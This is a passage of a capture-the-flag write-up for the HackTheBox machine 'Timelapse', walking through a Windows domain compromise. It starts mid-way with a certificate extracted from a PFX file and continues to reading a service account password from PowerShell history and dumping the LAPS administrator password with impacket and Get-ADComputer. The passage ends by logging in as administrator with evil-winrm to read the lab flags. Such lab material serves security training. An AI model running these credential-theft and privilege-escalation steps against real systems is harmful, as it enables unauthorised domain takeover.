Bag Attributes                                                                                                                                                              
    Microsoft Local Key set: <No Values>                                                                                                                                    
    localKeyID: 01 00 00 00                                                                                                                                                 
    friendlyName: te-4a534157-c8f1-4724-8db6-ed12f25c2a9b                                                                                                                   
    Microsoft CSP Name: Microsoft Software Key Storage Provider                                                                                                             
Key Attributes                                                                                                                                                              
    X509v3 Key Usage: 90                                                                                                                                                    
-----BEGIN ENCRYPTED PRIVATE KEY-----                                                                                                                                       
MIIFNTBfBgkqhkiG9w0BBQ0wUjAxBgkqhkiG9w0BBQwwJAQQ7UHQUgC9lozOl3Oq                                                                                                            
o793JwICCAAwDAYIKoZIhvcNAgkFADAdBglghkgBZQMEASoEEJzXpftlOQGfZnB3                      
aDIGG38EggTQjH3ErujcGECcMb+BabEZDzrHETS9r1fHFW0DCmpEoREnymsMS19y                      
kAgebzDpwmZDI43KUs8HnVhxCg5xaqK4J8RpJUu/KGUDY9l3SzNDO0lu0qVxJ24J                      
xPE/xUYSjQb2PW13o1BvqnyorJIGXjniUzGYYMrpxfpKZvUWjAxvrVRYq1FMaQ1O                      
XApTWqoCms8QMC7IWdFYHT4MNfKmUhrXyb6lAtWZETfUWtBq2PCHhnFc6vsUj9R2                      
MewCRMO+Wp8LjL95fKDFBsrGGV4ZZ8HqtrabuevJA+jDzak1M7pEbBmCfGEvjD1N                      
nBvF7sKJvyDhyaAry7nPmgVD3a/UOGkj3cH1VUo95Q9cBnsExYoQPp7rk28Cu9Mg                      
uXNeB2ehm8mZiQ2cj0cv5vlW8YCwsp0lYMho4E3Ohvzh2MoP1nbEbu32zZHPiKzc                      
F7QzPnzWWLXox2mphSnN/wa4Lp3SZkKXj9g/QcT+pBT/i76tR8E1nrBlLxHFZoVR                      
FO+sPZhSly/d03pgXTwRUIBfv/+MKXOnxgCLoYBQSq7/vYODKU3OmnYtBFWSwty7                      
q7nF84sgb9f8eOeL5xJx6ri6718kWaENXhuB2VUCLrQ8nS1SBG8sp1yFYRGRpRjf                      
nXLRpJaeIvdnbAVWd6SZ0IfKqMSpI9QmExbNoh1nhdvJZiMmqTxIdxaTrKZwX/NG                      
Ncyr0cj8R8NKOJyahJpEXSbVQjXmrBq/eZp8qDVASTJk01p/+PkheCGa6jO+b5KB                      
jIbQKyJoOdsxhFlJBIAFF+MPoI58vVsImSsCXKotuQdY0gCF6cLJGKBbzMaFROjg                      
tomV3VKe19Icerois1JP5C08AIao8ii9gnAzUPzTlkRsOn9pV7zevwHn/PRmdyjn                      
8dV9zSdqUPpwI6+YKSyZDibnfOsLdaX3wJuwsfZkmyNYZHyrq+xRcaYSwKpkaLj4                      
SjwaT7bqljhDXIB1OfoUxBIk+AiVyLjkRSKdV0l1UWTQju+nbkeIcPKIL4goFWq7                      
Sx+AaIR2eK4nkby+MRyhK2DeEpoMCs8Xz0MPrh87Ud9jm/8wFqkh6CSiJM5iCurw                      
x+Bl5SGX7qY+32wf7T6AZIInSwYUXl2t5Hshx9AdvVxoEIj9wVwRyFrZffWUGD5k                      
N4AO/Az0mS6vEX8SIIAgJXKrDNVhps6ODVyfsLOCJLT/whVPf+pyrD3KucWoAT9S                      
rwNQQdXvJJvxJE/PvTo0Yj4COQR5WXg3cFmOh+pUxvvjFxE9n6Fg2WrmDBYzNSH0                      
ruv0fqqvXvoONy1rWlXbdi8XRMQJTL0GFW+pKe/rKkof3peb05JFF+mZLVvn3WL+                      
EsCCYznmIGEdCaZyrVCOirUEyMGKRCwlc3pBqNcBwMODL9PJTN4bH4FEHDFq1oIa                      
VE6ulcmb6xtGXCAP1ipdv/2ILglB5inWVts4G4MROTHo6KqIpsq1zeNfu8+H9yhj                      
sD/HOtCjDmh0jVSriPPEQC/io8v3b9jSYtBlbw+QlfZgGfm6pRcw4Hnf0Ixp7Z4f                      
ecGUVlQt8cD+UhUkAyI55Y2OAH/VTVPdh3rw0ZjwIdVuvmX436/T9nzkl1A+mgS+                      
DnSl9YSLNntYDN7mFUlu09m9uTL6/9w4izWxEzOOtdDntPE0NxK8wHw=                              
-----END ENCRYPTED PRIVATE KEY-----

┌──(kali㉿kali)-[~/…/HackTheBox/Timelapse/smb/winrm_backup]                           
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.crt              
Enter Import Password: thuglegacy

┌──(kali㉿kali)-[~/…/HackTheBox/Timelapse/smb/winrm_backup]                           
└─$ cat certificate.crt                    
Bag Attributes                             
    localKeyID: 01 00 00 00                
subject=CN=Legacyy                         
issuer=CN=Legacyy                          
-----BEGIN CERTIFICATE-----                
MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS                      
MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1                      
MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC                      
AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0                      
0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb                      
YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z                      
7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72                      
MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs                      
yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg                      
MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX                      
DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe                      
rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa                      
m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0                      
3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/                      
fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG                      
hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh                      
nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA                              
-----END CERTIFICATE-----

Authenticate as legacyy:

We can now use evil-winrm to try if those (certificate, private key) are still valid:

┌──(kali㉿kali)-[~/…/HackTheBox/Timelapse/smb/winrm_backup]                                                                                                                 
└─$ evil-winrm -i 10.129.227.113 -c certificate.crt -k key.key -u legacyy -S                                                                                                
                                                                                                                                                                            
Evil-WinRM shell v3.7                                                                                                                                                       
                                                                                                                                                                            
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                            
                                                                                                                                                                            
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                       
                                                                                                                                                                            
Warning: SSL enabled                                                                                                                                                        
                                                                                                                                                                            
Info: Establishing connection to remote endpoint                                                                                                                            
Enter PEM pass phrase: obaida                                                                         
*Evil-WinRM* PS C:\Users\legacyy\Documents>

Shell as svc_deploy:

After doing some local enumeration we will find stored username and password in the (consolehost_history.txt file) powershell history (winPEAS can find this):

ÉÍÍÍÍÍÍÍÍÍÍ¹ PowerShell Settings                                                                                                                                            
    PowerShell v2 Version: 2.0                                                                                                                                              
    PowerShell v5 Version: 5.1.17763.1                                                                                                                                      
    PowerShell Core Version:                                                                                                                                                
    Transcription Settings:                                                                                                                                                 
    Module Logging Settings:                                                                                                                                                
    Scriptblock Logging Settings:                                                                                                                                           
    PS history file: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt                                                       
    PS history size: 434B

*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt                           
whoami                                                                                                                                                                      
ipconfig /all                                                                                                                                                               
netstat -ano |select-string LIST                                                      
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck              
$p = ConvertTo-SecureString 'E3R$Q62^12p7************' -AsPlainText -Force            
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)          
invoke-command -computername localhost -credential $c -port 5986 -usessl -                                                                                                  
SessionOption $so -scriptblock {whoami}                                                                                                                                     
get-aduser -filter * -properties *                                                    
exit

Lets check if those credentials are valid:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Timelapse]
└─$ netexec smb 10.129.227.113 -u svc_deploy -p 'E3R$Q62^12p7************'
SMB         10.129.227.113  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False) 
SMB         10.129.227.113  445    DC01             [+] timelapse.htb\svc_deploy:E3R$Q62^12p7************

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Timelapse]
└─$ netexec winrm 10.129.227.113 -u svc_deploy -p 'E3R$Q62^12p7************'
WINRM-SSL   10.129.227.113  5986   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:timelapse.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM-SSL   10.129.227.113  5986   DC01             [+] timelapse.htb\svc_deploy:E3R$Q62^12p7************ (Pwn3d!)

Privilege Escalation:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Timelapse]
└─$ evil-winrm -i 10.129.227.113 -u svc_deploy -p 'E3R$Q62^12p7************' -S
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>

BloodHound:

I will upload SharpHound.exe this time:

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> upload SharpHound.exe                                                                                                           
                                                                                                                                                                            
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Timelapse/SharpHound.exe to C:\Users\svc_deploy\Documents\SharpHound.exe                                            
                                                                                                                                                                            
Data: 1744896 bytes of 1744896 bytes copied                                                                                                                                 
                                                                                                                                                                            
Info: Upload successful!                                                                                                                                                    
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> dir                                                                                                                             
                                                                                                                                                                            
                                                                                                                                                                            
    Directory: C:\Users\svc_deploy\Documents                                                                                                                                   
                                                                                                                                                                            
                                                                                                                                                                            
Mode                LastWriteTime         Length Name                                                                                                                       
----                -------------         ------ ----                                                                                                                       
-a----         9/6/2025   7:54 AM        1308672 SharpHound.exe

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> .\SharpHound.exe -c All --zipfilename bloodhound                                                                                                                                                                                                                                     
2025-09-06T07:54:54.1366852-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound                                                 
2025-09-06T07:54:54.3398063-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DC
OM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry                                           
2025-09-06T07:54:54.3710817-07:00|INFORMATION|Initializing SharpHound at 7:54 AM on 9/6/2025                                                                                
2025-09-06T07:54:54.4335617-07:00|INFORMATION|Resolved current domain to timelapse.htb                                                                                      
2025-09-06T07:55:03.8085659-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemo
te, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry                                                                 
2025-09-06T07:55:03.9179442-07:00|INFORMATION|Beginning LDAP search for timelapse.htb                                                                                       
2025-09-06T07:55:04.0741823-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for TIMELAPSE.HTB
<snipped>

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> dir                                                                                                                                                                                                                                                                               
                                                                                                                                                                            
                                                                                                                                                                            
    Directory: C:\Users\svc_deploy\Documents                                                                                                                                   
                                                                                                                                                                            
                                                                                                                                                                            
Mode                LastWriteTime         Length Name                                                                                                                       
----                -------------         ------ ----                                                                                                                       
-a----         9/6/2025   7:55 AM          28867 20250906075505_bloodhound.zip                                                                                              
-a----         9/6/2025   7:55 AM           1363 NzcwYWNhMTEtODlmNS00OTNiLWEyNjAtZDQ2YjczY2QzMDk2.bin                                                                       
-a----         9/6/2025   7:54 AM        1308672 SharpHound.exe                                                                                                             
                                                                                                                                                                            
                                                                                                                                                                            
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> download 20250906075505_bloodhound.zip                                                                                          
                                                                                                                                                                            
Info: Downloading C:\Users\svc_deploy\Documents\20250906075505_bloodhound.zip to 20250906075505_bloodhound.zip                                                                 
                                                                                                                                                                            
Info: Download successful!

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Timelapse/bloodhound]
└─$ sudo bloodhound                                                                                                                                                         
[sudo] password for kali:                                                                                                                                                   
                                                                                                                                                                            
 Starting neo4j                                                                                                                                                             
Neo4j is not running.                                                                                                                                                       
Directories in use:                                                                                                                                                         
home:         /usr/share/neo4j                                                                                                                                              
config:       /usr/share/neo4j/conf                                                                                                                                         
logs:         /etc/neo4j/logs                                                                                                                                               
plugins:      /usr/share/neo4j/plugins                                                                                                                                      
import:       /usr/share/neo4j/import                                                                                                                                       
data:         /etc/neo4j/data                                                                                                                                               
certificates: /usr/share/neo4j/certificates                                                                                                                                 
licenses:     /usr/share/neo4j/licenses                                                                                                                                     
run:          /var/lib/neo4j/run                                                                                                                                            
Starting Neo4j.                                                                                                                                                             
Started neo4j (pid:69666). It is available at http://localhost:7474                                                                                                         
There may be a short delay until the server is ready.                                                                                                                       
................................................                                                                                                                            
 Bloodhound will start
 
<snipped>

Read LAPS:

After uploading the .zip file to bloodhound, we will see that svc_deploy can read laps passwords:

And we can use multiple tools to accomplish reading the laps passwords:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Timelapse]                               
└─$ impacket-GetLAPSPassword timelapse.htb/svc_deploy:'E3R$Q62^12p7************' -dc-ip 10.129.227.113    
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies                                                                                                  
                                                                                      
Host   LAPS Username  LAPS Password             LAPS Password Expiration  LAPSv2                                                                                            
-----  -------------  ------------------------  ------------------------  ------                                                                                            
DC01$  N/A            7#pq3Rz@(H;E************  2025-09-11 10:04:25       False

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'


DistinguishedName           : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                 : dc01.timelapse.htb
Enabled                     : True
ms-mcs-admpwd               : 7#pq3Rz@(H;E************
ms-mcs-admpwdexpirationtime : 134020730653710677
Name                        : DC01
ObjectClass                 : computer
ObjectGUID                  : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName              : DC01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName           :

Here we have the password for the administrator, we can now authenticate as him:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Timelapse]                                                                                                    03:30:05 [89/182]
└─$ evil-winrm -i 10.129.227.113 -u administrator -p '7#pq3Rz@(H;E************' -S                                                                                          
                                                                                                                                                                            
Evil-WinRM shell v3.7                                                                                                                                                       
                                                                                                                                                                            
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                            
                                                                                                                                                                            
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                       
                                                                                                                                                                            
Warning: SSL enabled                                                                                                                                                        
                                                                                                                                                                            
Info: Establishing connection to remote endpoint                                                                                                                            
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami                                                                                                                    
timelapse\administrator                                                                                                                                                     
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname                                                                                                                  
dc01                                                                                                                                                                        
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig                                                                                                                  
                                                                                                                                                                            
Windows IP Configuration                                                                                                                                                    
                                                                                                                                                                            
                                                                                                                                                                            
Ethernet adapter Ethernet0:                                                                                                                                                 
                                                                                                                                                                            
   Connection-specific DNS Suffix  . : .htb                                                                                                                                 
   IPv6 Address. . . . . . . . . . . : dead:beef::f996:6697:a6df:daf6                                                                                                       
   Link-local IPv6 Address . . . . . : fe80::f996:6697:a6df:daf6%13                                                                                                         
   IPv4 Address. . . . . . . . . . . : 10.129.227.113                                                                                                                       
   Subnet Mask . . . . . . . . . . . : 255.255.0.0                                                                                                                          
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%13                                                                                                          
                                       10.129.0.1

And we can read the flags:

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\TRX\Desktop\root.txt
e2c1db72b3787c57****************
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\legacyy\Desktop\user.txt
a6dffa4174f1bcff****************

PreviousMonteverde NextFlight

Last updated 5 months ago

hashtagEnumeration:

hashtagNmap:

hashtagEnumerate the shares:

hashtagAuthenticate as legacyy:

hashtagShell as svc_deploy:

hashtagPrivilege Escalation:

hashtagBloodHound:

hashtagRead LAPS: